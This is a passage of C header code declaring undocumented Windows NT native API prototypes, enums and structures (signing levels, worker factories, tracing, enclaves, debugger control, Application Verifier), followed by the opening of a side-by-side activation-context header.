SE_SIGNING_LEVEL_MICROSOFT 0x00000008 #endif #ifndef SE_SIGNING_LEVEL_CUSTOM_4 #define SE_SIGNING_LEVEL_CUSTOM_4 0x00000009 #endif #ifndef SE_SIGNING_LEVEL_CUSTOM_5 #define SE_SIGNING_LEVEL_CUSTOM_5 0x0000000A #endif #ifndef SE_SIGNING_LEVEL_DYNAMIC_CODEGEN #define SE_SIGNING_LEVEL_DYNAMIC_CODEGEN 0x0000000B #endif #ifndef SE_SIGNING_LEVEL_WINDOWS #define SE_SIGNING_LEVEL_WINDOWS 0x0000000C #endif #ifndef SE_SIGNING_LEVEL_CUSTOM_7 #define SE_SIGNING_LEVEL_CUSTOM_7 0x0000000D #endif #ifndef SE_SIGNING_LEVEL_WINDOWS_TCB #define 
SE_SIGNING_LEVEL_WINDOWS_TCB 0x0000000E #endif #ifndef SE_SIGNING_LEVEL_CUSTOM_6 #define SE_SIGNING_LEVEL_CUSTOM_6 0x0000000F #endif NTSYSAPI NTSTATUS NTAPI NtSetCachedSigningLevel( _In_ ULONG Flags, _In_ SE_SIGNING_LEVEL InputSigningLevel, _In_reads_(SourceFileCount) PHANDLE SourceFiles, _In_ ULONG SourceFileCount, _In_opt_ HANDLE TargetFile); NTSYSAPI NTSTATUS NTAPI NtSetCachedSigningLevel2( _In_ ULONG Flags, _In_ SE_SIGNING_LEVEL InputSigningLevel, _In_reads_(SourceFileCount) PHANDLE SourceFiles, _In_ ULONG SourceFileCount, _In_opt_ HANDLE TargetFile, _In_opt_ SE_SET_FILE_CACHE_INFORMATION* CacheInformation); NTSYSAPI NTSTATUS NTAPI NtGetCachedSigningLevel( _In_ HANDLE File, _Out_ PULONG Flags, _Out_ PSE_SIGNING_LEVEL SigningLevel, _Out_writes_bytes_to_opt_(*ThumbprintSize, *ThumbprintSize) PUCHAR Thumbprint, _Inout_opt_ PULONG ThumbprintSize, _Out_opt_ PULONG ThumbprintAlgorithm); //REDSTONE 2 and above NTSYSAPI NTSTATUS NTAPI NtCompareSigningLevels( _In_ SE_SIGNING_LEVEL FirstSigningLevel, _In_ SE_SIGNING_LEVEL SecondSigningLevel); /************************************************************************************ * * Worker Factory API. 
* ************************************************************************************/ typedef enum _WORKERFACTORYINFOCLASS { WorkerFactoryTimeout, WorkerFactoryRetryTimeout, WorkerFactoryIdleTimeout, WorkerFactoryBindingCount, WorkerFactoryThreadMinimum, WorkerFactoryThreadMaximum, WorkerFactoryPaused, WorkerFactoryBasicInformation, WorkerFactoryAdjustThreadGoal, WorkerFactoryCallbackType, WorkerFactoryStackInformation, WorkerFactoryThreadBasePriority, WorkerFactoryTimeoutWaiters, WorkerFactoryFlags, WorkerFactoryThreadSoftMaximum, MaxWorkerFactoryInfoClass } WORKERFACTORYINFOCLASS, *PWORKERFACTORYINFOCLASS; typedef struct _WORKER_FACTORY_BASIC_INFORMATION { LARGE_INTEGER Timeout; LARGE_INTEGER RetryTimeout; LARGE_INTEGER IdleTimeout; BOOLEAN Paused; BOOLEAN TimerSet; BOOLEAN QueuedToExWorker; BOOLEAN MayCreate; BOOLEAN CreateInProgress; BOOLEAN InsertedIntoQueue; BOOLEAN Shutdown; ULONG BindingCount; ULONG ThreadMinimum; ULONG ThreadMaximum; ULONG PendingWorkerCount; ULONG WaitingWorkerCount; ULONG TotalWorkerCount; ULONG ReleaseCount; LONGLONG InfiniteWaitGoal; PVOID StartRoutine; PVOID StartParameter; HANDLE ProcessId; SIZE_T StackReserve; SIZE_T StackCommit; NTSTATUS LastThreadCreationStatus; } WORKER_FACTORY_BASIC_INFORMATION, *PWORKER_FACTORY_BASIC_INFORMATION; NTSYSAPI NTSTATUS NTAPI NtCreateWorkerFactory( _Out_ PHANDLE WorkerFactoryHandleReturn, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE CompletionPortHandle, _In_ HANDLE WorkerProcessHandle, _In_ PVOID StartRoutine, _In_opt_ PVOID StartParameter, _In_opt_ ULONG MaxThreadCount, _In_opt_ SIZE_T StackReserve, _In_opt_ SIZE_T StackCommit); NTSYSAPI NTSTATUS NTAPI NtQueryInformationWorkerFactory( _In_ HANDLE WorkerFactoryHandle, _In_ WORKERFACTORYINFOCLASS WorkerFactoryInformationClass, _Out_writes_bytes_(WorkerFactoryInformationLength) PVOID WorkerFactoryInformation, _In_ ULONG WorkerFactoryInformationLength, _Out_opt_ PULONG ReturnLength); NTSYSAPI NTSTATUS 
NTAPI NtShutdownWorkerFactory( _In_ HANDLE WorkerFactoryHandle, _Inout_ volatile LONG *PendingWorkerCount); NTSYSAPI NTSTATUS NTAPI NtReleaseWorkerFactoryWorker( _In_ HANDLE WorkerFactoryHandle); /************************************************************************************ * * Event Tracing API. * ************************************************************************************/ typedef enum _TRACE_CONTROL_INFORMATION_CLASS { TraceControlStartLogger = 1, TraceControlStopLogger = 2, TraceControlQueryLogger = 3, TraceControlUpdateLogger = 4, TraceControlFlushLogger = 5, TraceControlIncrementLoggerFile = 6, TraceControlInvalidClass1 = 7, TraceControlInvalidCalss2 = 8, TraceControlInvalidClass3 = 9, TraceControlInvalidClass4 = 10, TraceControlRealtimeConnect = 11, TraceControlWdiDispatchControl = 13, TraceControlRealtimeDisconnectConsumerByHandle = 14, TraceControlReceiveNotification = 16, TraceControlEnableGuid = 17, TraceControlSendReplyDataBlock = 18, TraceControlReceiveReplyDataBlock = 19, TraceControlWdiUpdateSem = 20, TraceControlGetTraceGuidList = 21, TraceControlGetTraceGuidInfo = 22, TraceControlEnumerateTraceGuids = 23, TraceControlInvalidClass5 = 24, TraceControlQueryReferenceTime = 25, TraceControlTrackProviderBinary = 26, TraceControlAddNotificationEvent = 27, TraceControlUpdateDisallowList = 28, TraceControlInvalidClass6 = 29, TraceControlInvalidClass7 = 30, TraceControlUseDescriptorTypeUm = 31, TraceControlGetTraceGroupList = 32, TraceControlGetTraceGroupInfo = 33, TraceControlTraceSetDisallowList = 34, TraceControlSetCompressionSettings = 35, TraceControlGetCompressionSettings = 36, TraceControlUpdatePeriodicCaptureState = 37, TraceControlGetPrivateSessionTraceHandle = 38, TraceControlRegisterPrivateSession = 39, TraceControlQuerySessionDemuxObject = 40, TraceControlSetProviderBinaryTracking = 41, TraceControlMaxLoggers = 42, TraceControlMaxPmcCounter = 43 } TRACE_CONTROL_INFORMATION_CLASS; NTSYSAPI NTSTATUS NTAPI NtTraceEvent( _In_ HANDLE 
TraceHandle, _In_ ULONG Flags, _In_ ULONG FieldSize, _In_ PVOID Fields); NTSYSAPI NTSTATUS NTAPI NtTraceControl( _In_ TRACE_CONTROL_INFORMATION_CLASS TraceInformationClass, _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer, _In_ ULONG InputBufferLength, _Out_writes_bytes_opt_(TraceInformationLength) PVOID TraceInformation, _In_ ULONG TraceInformationLength, _Out_ PULONG ReturnLength); /************************************************************************************ * * Enclave API. * ************************************************************************************/ #ifndef _WIN32_WINNT_WIN10 #define _WIN32_WINNT_WIN10 0x0A00 #endif #if (_WIN32_WINNT < _WIN32_WINNT_WIN10) typedef LPVOID(WINAPI* PENCLAVE_ROUTINE) (LPVOID lpThreadParameter); typedef PENCLAVE_ROUTINE LPENCLAVE_ROUTINE; #endif NTSYSAPI NTSTATUS NTAPI NtCreateEnclave( _In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _In_ SIZE_T Size, _In_ SIZE_T InitialCommitment, _In_ ULONG EnclaveType, _In_reads_bytes_(EnclaveInformationLength) PVOID EnclaveInformation, _In_ ULONG EnclaveInformationLength, _Out_opt_ PULONG EnclaveError); NTSYSAPI NTSTATUS NTAPI NtLoadEnclaveData( _In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_reads_bytes_(BufferSize) PVOID Buffer, _In_ SIZE_T BufferSize, _In_ ULONG Protect, _In_reads_bytes_(PageInformationLength) PVOID PageInformation, _In_ ULONG PageInformationLength, _Out_opt_ PSIZE_T NumberOfBytesWritten, _Out_opt_ PULONG EnclaveError); NTSYSAPI NTSTATUS NTAPI NtInitializeEnclave( _In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_reads_bytes_(EnclaveInformationLength) PVOID EnclaveInformation, _In_ ULONG EnclaveInformationLength, _Out_opt_ PULONG EnclaveError); NTSYSAPI NTSTATUS NTAPI NtTerminateEnclave( _In_ PVOID BaseAddress, _In_ BOOLEAN WaitForThread); NTSYSAPI NTSTATUS NTAPI NtCallEnclave( _In_ PENCLAVE_ROUTINE Routine, _In_ PVOID Parameter, _In_ BOOLEAN WaitForThread, _Out_opt_ PVOID* ReturnValue); 
/************************************************************************************ * * LUID/UUID API. * ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI NtSetUuidSeed( _In_ PCHAR Seed); NTSYSAPI NTSTATUS NTAPI NtAllocateUuids( _Out_ PULARGE_INTEGER Time, _Out_ PULONG Range, _Out_ PULONG Sequence, _Out_ PCHAR Seed); NTSYSAPI NTSTATUS NTAPI NtAllocateLocallyUniqueId( _Out_ PLUID Luid); /************************************************************************************ * * Kernel Debugger API. * ************************************************************************************/ typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { BOOLEAN KernelDebuggerEnabled; BOOLEAN KernelDebuggerNotPresent; } SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX { BOOLEAN DebuggerAllowed; BOOLEAN DebuggerEnabled; BOOLEAN DebuggerPresent; } SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION_EX; typedef enum _SYSDBG_COMMAND { SysDbgQueryModuleInformation, SysDbgQueryTraceInformation, SysDbgSetTracepoint, SysDbgSetSpecialCall, SysDbgClearSpecialCalls, SysDbgQuerySpecialCalls, SysDbgBreakPoint, SysDbgQueryVersion, SysDbgReadVirtual, SysDbgWriteVirtual, SysDbgReadPhysical, SysDbgWritePhysical, SysDbgReadControlSpace, SysDbgWriteControlSpace, SysDbgReadIoSpace, SysDbgWriteIoSpace, SysDbgReadMsr, SysDbgWriteMsr, SysDbgReadBusData, SysDbgWriteBusData, SysDbgCheckLowMemory, SysDbgEnableKernelDebugger, SysDbgDisableKernelDebugger, SysDbgGetAutoKdEnable, SysDbgSetAutoKdEnable, SysDbgGetPrintBufferSize, SysDbgSetPrintBufferSize, SysDbgGetKdUmExceptionEnable, SysDbgSetKdUmExceptionEnable, SysDbgGetTriageDump, SysDbgGetKdBlockEnable, SysDbgSetKdBlockEnable, SysDbgRegisterForUmBreakInfo, SysDbgGetUmBreakPid, SysDbgClearUmBreakPid, SysDbgGetUmAttachPid, SysDbgClearUmAttachPid, SysDbgGetLiveKernelDump, SysDbgKdPullRemoteFile, 
SysDbgMaxInfoClass } SYSDBG_COMMAND, *PSYSDBG_COMMAND; typedef struct _SYSDBG_VIRTUAL { PVOID Address; PVOID Buffer; ULONG Request; } SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; NTSYSAPI NTSTATUS NTAPI NtSystemDebugControl( _In_ SYSDBG_COMMAND Command, _Inout_updates_bytes_opt_(InputBufferLength) PVOID InputBuffer, _In_ ULONG InputBufferLength, _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer, _In_ ULONG OutputBufferLength, _Out_opt_ PULONG ReturnLength); /************************************************************************************ * * HardError API. * ************************************************************************************/ #ifndef HARDERROR_OVERRIDE_ERRORMODE #define HARDERROR_OVERRIDE_ERRORMODE 0x10000000 #endif typedef enum _HARDERROR_RESPONSE_OPTION { OptionAbortRetryIgnore, OptionOk, OptionOkCancel, OptionRetryCancel, OptionYesNo, OptionYesNoCancel, OptionShutdownSystem, OptionOkNoWait, OptionCancelTryContinue } HARDERROR_RESPONSE_OPTION; typedef enum _HARDERROR_RESPONSE { ResponseReturnToCaller, ResponseNotHandled, ResponseAbort, ResponseCancel, ResponseIgnore, ResponseNo, ResponseOk, ResponseRetry, ResponseYes, ResponseTryAgain, ResponseContinue } HARDERROR_RESPONSE; NTSYSCALLAPI NTSTATUS NTAPI NtRaiseHardError( _In_ NTSTATUS ErrorStatus, _In_ ULONG NumberOfParameters, _In_ ULONG UnicodeStringParameterMask, _In_reads_(NumberOfParameters) PULONG_PTR Parameters, _In_ ULONG ValidResponseOptions, _Out_ PULONG Response); /************************************************************************************ * * IoRing API. * ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI NtCreateIoRing( _Out_ PHANDLE IoRingHandle, _In_ ULONG CreateParametersLength, _In_ PVOID CreateParameters, _In_ ULONG OutputParametersLength, _Out_ PVOID OutputParameters); /************************************************************************************ * * Thread Pooling API and definitions. 
* ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI TpAllocPool( _Out_ PTP_POOL* PoolReturn, _Reserved_ PVOID Reserved); NTSYSAPI VOID NTAPI TpReleasePool( _Inout_ PTP_POOL Pool); NTSYSAPI NTSTATUS NTAPI TpAllocWork( _Out_ PTP_WORK* WorkReturn, _In_ PTP_WORK_CALLBACK Callback, _Inout_opt_ PVOID Context, _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron); NTSYSAPI VOID NTAPI TpReleaseWork( _Inout_ PTP_WORK Work); NTSYSAPI VOID NTAPI TpPostWork( _Inout_ PTP_WORK Work); NTSYSAPI VOID NTAPI TpWaitForWork( _Inout_ PTP_WORK Work, _In_ LOGICAL CancelPendingCallbacks); /************************************************************************************ * * ApiSet definitions. * ************************************************************************************/ NTSYSAPI BOOL NTAPI ApiSetQueryApiSetPresence( _In_ PCUNICODE_STRING Namespace, _Out_ PBOOLEAN Present); NTSYSAPI BOOL NTAPI ApiSetQueryApiSetPresenceEx( _In_ PCUNICODE_STRING Namespace, _Out_ PBOOLEAN IsInSchema, _Out_ PBOOLEAN Present); /************************************************************************************ * * Application Verifier API and definitions. 
* ************************************************************************************/ #ifndef DLL_PROCESS_VERIFIER #define DLL_PROCESS_VERIFIER 4 #endif typedef VOID(NTAPI *RTL_VERIFIER_DLL_LOAD_CALLBACK)( PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved); typedef VOID(NTAPI *RTL_VERIFIER_DLL_UNLOAD_CALLBACK)( PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved); typedef VOID(NTAPI *RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK)( PVOID AllocationBase, SIZE_T AllocationSize); typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR { PCHAR ThunkName; PVOID ThunkOldAddress; PVOID ThunkNewAddress; } RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR; typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR { PWCHAR DllName; DWORD DllFlags; PVOID DllAddress; PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks; } RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR; typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR { DWORD Length; PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls; RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback; RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback; PWSTR VerifierImage; DWORD VerifierFlags; DWORD VerifierDebug; PVOID RtlpGetStackTraceAddress; PVOID RtlpDebugPageHeapCreate; PVOID RtlpDebugPageHeapDestroy; RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback; } RTL_VERIFIER_PROVIDER_DESCRIPTOR, *PRTL_VERIFIER_PROVIDER_DESCRIPTOR; // // Application verifier standard flags. 
// #define RTL_VRF_FLG_FULL_PAGE_HEAP 0x00000001 #define RTL_VRF_FLG_RESERVED_DONOTUSE 0x00000002 #define RTL_VRF_FLG_HANDLE_CHECKS 0x00000004 #define RTL_VRF_FLG_STACK_CHECKS 0x00000008 #define RTL_VRF_FLG_APPCOMPAT_CHECKS 0x00000010 #define RTL_VRF_FLG_TLS_CHECKS 0x00000020 #define RTL_VRF_FLG_DIRTY_STACKS 0x00000040 #define RTL_VRF_FLG_RPC_CHECKS 0x00000080 #define RTL_VRF_FLG_COM_CHECKS 0x00000100 #define RTL_VRF_FLG_DANGEROUS_APIS 0x00000200 #define RTL_VRF_FLG_RACE_CHECKS 0x00000400 #define RTL_VRF_FLG_DEADLOCK_CHECKS 0x00000800 #define RTL_VRF_FLG_FIRST_CHANCE_EXCEPTION_CHECKS 0x00001000 #define RTL_VRF_FLG_VIRTUAL_MEM_CHECKS 0x00002000 #define RTL_VRF_FLG_ENABLE_LOGGING 0x00004000 #define RTL_VRF_FLG_FAST_FILL_HEAP 0x00008000 #define RTL_VRF_FLG_VIRTUAL_SPACE_TRACKING 0x00010000 #define RTL_VRF_FLG_ENABLED_SYSTEM_WIDE 0x00020000 #define RTL_VRF_FLG_MISCELLANEOUS_CHECKS 0x00020000 #define RTL_VRF_FLG_LOCK_CHECKS 0x00040000 NTSYSAPI VOID NTAPI RtlApplicationVerifierStop( _In_ ULONG_PTR Code, _In_ PSTR Message, _In_ ULONG_PTR Param1, _In_ PSTR Description1, _In_ ULONG_PTR Param2, _In_ PSTR Description2, _In_ ULONG_PTR Param3, _In_ PSTR Description3, _In_ ULONG_PTR Param4, _In_ PSTR Description4); #ifndef VERIFIER_STOP #define VERIFIER_STOP(Code, Msg, P1, S1, P2, S2, P3, S3, P4, S4) { \ RtlApplicationVerifierStop ((Code), \ (Msg), \ (ULONG_PTR)(P1),(S1), \ (ULONG_PTR)(P2),(S2), \ (ULONG_PTR)(P3),(S3), \ (ULONG_PTR)(P4),(S4)); \ } #endif /************************************************************************************ * * CPU partition API & definitions. 
* ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI NtOpenCpuPartition( _Out_ PHANDLE CpuPartitionHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes); NTSYSAPI NTSTATUS NTAPI NtCreateCpuPartition( _Out_ PHANDLE CpuPartitionHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes); NTSYSAPI NTSTATUS NTAPI NtSetInformationCpuPartition( _In_ HANDLE CpuPartitionHandle, _In_ ULONG CpuPartitionInformationClass, _In_reads_bytes_(CpuPartitionInformationLength) PVOID CpuPartitionInformation, _In_ ULONG CpuPartitionInformationLength, _Reserved_ PVOID Reserved0, _Reserved_ ULONG Reserved1, _Reserved_ ULONG Reserved2); NTSYSAPI NTSTATUS NTAPI NtQueryInformationCpuPartition( _In_ HANDLE CpuPartitionHandle, _In_ ULONG CpuPartitionInformationClass, _Out_writes_bytes_opt_(CpuPartitionInformationLength) PVOID CpuPartitionInformation, _In_ ULONG CpuPartitionInformationLength, _Out_opt_ PULONG ReturnLength); // // NTOS_RTL HEADER END // #ifdef __cplusplus } #endif #pragma warning(pop) #endif NTOS_RTL ================================================ FILE: Source/Shared/ntos/ntsxs.h ================================================ /************************************************************************************ * * (C) COPYRIGHT AUTHORS, 2017 - 2023, translated from Microsoft sources/debugger * * TITLE: NTSXS.H * * VERSION: 1.05 * * DATE: 24 Jun 2023 * * Common header file for the SxS related API functions and definitions. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
* ************************************************************************************/ #ifndef NTSXS_RTL #define NTSXS_RTL // // NTSXS_RTL HEADER BEGIN // #if defined(__cplusplus) extern "C" { #endif #pragma warning(push) #pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int #define ACTCTX_PROCESS_DEFAULT ((void*)NULL) #define ACTCTX_EMPTY ((void*)(LONG_PTR)-3) #define ACTCTX_SYSTEM_DEFAULT ((void*)(LONG_PTR)-4) #define IS_SPECIAL_ACTCTX(x) (((((LONG_PTR)(x)) - 1) | 7) == -1) typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT; typedef const struct _ACTIVATION_CONTEXT *PCACTIVATION_CONTEXT; #define INVALID_ACTIVATION_CONTEXT ((PACTIVATION_CONTEXT) ((LONG_PTR) -1)) #define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_USE_ACTIVE_ACTIVATION_CONTEXT (0x00000001) #define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_ACTIVATION_CONTEXT_IS_MODULE (0x00000002) #define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_ACTIVATION_CONTEXT_IS_ADDRESS (0x00000004) #define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_NO_ADDREF (0x80000000) #define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_ACTIVATION_CONTEXT (0x00000001) #define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_FLAGS (0x00000002) #define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_ASSEMBLY_METADATA (0x00000004) #define ACTIVATION_CONTEXT_SECTION_FORMAT_UNKNOWN 0 #define ACTIVATION_CONTEXT_SECTION_FORMAT_STRING 1 #define ACTIVATION_CONTEXT_SECTION_FORMAT_GUID 2 #define ACTIVATION_CONTEXT_DATA_MAGIC 0x78746341 //'xtcA' #define ACTIVATION_CONTEXT_STRING_SECTION_MAGIC 0x64487353 //'dHsS' #define ACTIVATION_CONTEXT_GUID_SECTION_MAGIC 0x64487347 //'dHsG' typedef struct _ACTIVATION_CONTEXT_DATA_TOC_HEADER { ULONG HeaderSize; ULONG EntryCount; ULONG FirstEntryOffset; ULONG Flags; } ACTIVATION_CONTEXT_DATA_TOC_HEADER, *PACTIVATION_CONTEXT_DATA_TOC_HEADER; typedef struct _ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER { ULONG HeaderSize; ULONG EntryCount; ULONG FirstEntryOffset; ULONG 
Flags; } ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER, *PACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER; typedef struct _ACTIVATION_CONTEXT_DATA_TOC_ENTRY { ULONG Id; //type of section ULONG Offset; ULONG Length; ULONG Format; //ACTIVATION_CONTEXT_SECTION_FORMAT_* } ACTIVATION_CONTEXT_DATA_TOC_ENTRY, *PACTIVATION_CONTEXT_DATA_TOC_ENTRY; typedef struct _ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY { GUID ExtensionGuid; ULONG Offset; ULONG Length; } ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY, *PACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY; typedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HEADER { ULONG Magic; ULONG HeaderSize; ULONG FormatVersion; ULONG DataFormatVersion; ULONG Flags; ULONG ElementCount; ULONG ElementListOffset; ULONG HashAlgorithm; ULONG SearchStructureOffset; ULONG UserDataOffset; ULONG UserDataSize; } ACTIVATION_CONTEXT_STRING_SECTION_HEADER, *PACTIVATION_CONTEXT_STRING_SECTION_HEADER; #define ACTIVATION_CONTEXT_STRING_SECTION_CASE_INSENSITIVE (0x00000001) #define ACTIVATION_CONTEXT_STRING_SECTION_ENTRIES_IN_PSEUDOKEY_ORDER (0x00000002) typedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE { ULONG BucketTableEntryCount; ULONG BucketTableOffset; } ACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE, *PACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE; typedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET { ULONG ChainCount; ULONG ChainOffset; } ACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET, *PACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET; typedef struct _ACTIVATION_CONTEXT_STRING_SECTION_ENTRY { ULONG PseudoKey; ULONG KeyOffset; ULONG KeyLength; ULONG Offset; ULONG Length; ULONG AssemblyRosterIndex; } ACTIVATION_CONTEXT_STRING_SECTION_ENTRY, *PACTIVATION_CONTEXT_STRING_SECTION_ENTRY; typedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HEADER { ULONG Magic; ULONG HeaderSize; ULONG FormatVersion; ULONG DataFormatVersion; ULONG Flags; ULONG ElementCount; ULONG ElementListOffset; ULONG HashAlgorithm; ULONG SearchStructureOffset; ULONG UserDataOffset; ULONG 
UserDataSize;
} ACTIVATION_CONTEXT_GUID_SECTION_HEADER, *PACTIVATION_CONTEXT_GUID_SECTION_HEADER;

typedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE {
    ULONG BucketTableEntryCount;
    ULONG BucketTableOffset;
} ACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE, *PACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE;

typedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET {
    ULONG ChainCount;
    ULONG ChainOffset;
} ACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET, *PACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET;

typedef struct _ACTIVATION_CONTEXT_GUID_SECTION_ENTRY {
    GUID Guid;
    ULONG Offset;
    ULONG Length;
    ULONG AssemblyRosterIndex;
} ACTIVATION_CONTEXT_GUID_SECTION_ENTRY, *PACTIVATION_CONTEXT_GUID_SECTION_ENTRY;

typedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION {
    ULONG Size;
    ULONG Flags;
    GUID PolicyCoherencyGuid;
    GUID PolicyOverrideGuid;
    ULONG ApplicationDirectoryPathType;
    ULONG ApplicationDirectoryLength;
    ULONG ApplicationDirectoryOffset;
    ULONG ResourceName;
} ACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION;

#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ROOT_ASSEMBLY (0x00000001)
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_POLICY_APPLIED (0x00000002)
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ASSEMBLY_POLICY_APPLIED (0x00000004)
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ROOT_POLICY_APPLIED (0x00000008)
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_PRIVATE_ASSEMBLY (0x00000010)

#pragma pack(push,1)
typedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION {
    ULONG Size;
    ULONG Flags;
    ULONG EncodedAssemblyIdentityLength;
    ULONG EncodedAssemblyIdentityOffset;
    ULONG ManifestPathType;
    ULONG ManifestPathLength;
    ULONG ManifestPathOffset;
    LARGE_INTEGER ManifestLastWriteTime;
    ULONG PolicyPathType;
    ULONG PolicyPathLength;
    ULONG PolicyPathOffset;
    LARGE_INTEGER PolicyLastWriteTime;
    ULONG MetadataSatelliteRosterIndex;
    ULONG Unused2;
    ULONG ManifestVersionMajor;
    ULONG
ManifestVersionMinor; ULONG PolicyVersionMajor; ULONG PolicyVersionMinor; ULONG AssemblyDirectoryNameLength; ULONG AssemblyDirectoryNameOffset; ULONG NumOfFilesInAssembly; ULONG LanguageLength; ULONG LanguageOffset; ACTCTX_REQUESTED_RUN_LEVEL RunLevel; ULONG UiAccess; } ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION; #pragma pack(pop) #define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_INCLUDES_BASE_NAME (0x00000001) #define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_OMITS_ASSEMBLY_ROOT (0x00000002) #define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_EXPAND (0x00000004) #define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SYSTEM_DEFAULT_REDIRECTED_SYSTEM32_DLL (0x00000008) typedef struct _ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION { ULONG Size; ULONG Flags; ULONG TotalPathLength; ULONG PathSegmentCount; ULONG PathSegmentOffset; } ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION, *PACTIVATION_CONTEXT_DATA_DLL_REDIRECTION; typedef struct _ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT { ULONG Length; ULONG Offset; } ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT, *PACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT; typedef struct _ACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION { ULONG Size; ULONG Flags; ULONG VersionSpecificClassNameLength; ULONG VersionSpecificClassNameOffset; ULONG DllNameLength; ULONG DllNameOffset; } ACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION, *PACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION; #define ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS_FORMAT_LONGHORN (1) #define SXS_WINDOWS_SETTINGS_NAMESPACE L"http://schemas.microsoft.com/SMI/2005/WindowsSettings" #define SXS_WINDOWS_SETTINGS_NAMESPACE_CCH (53) #define 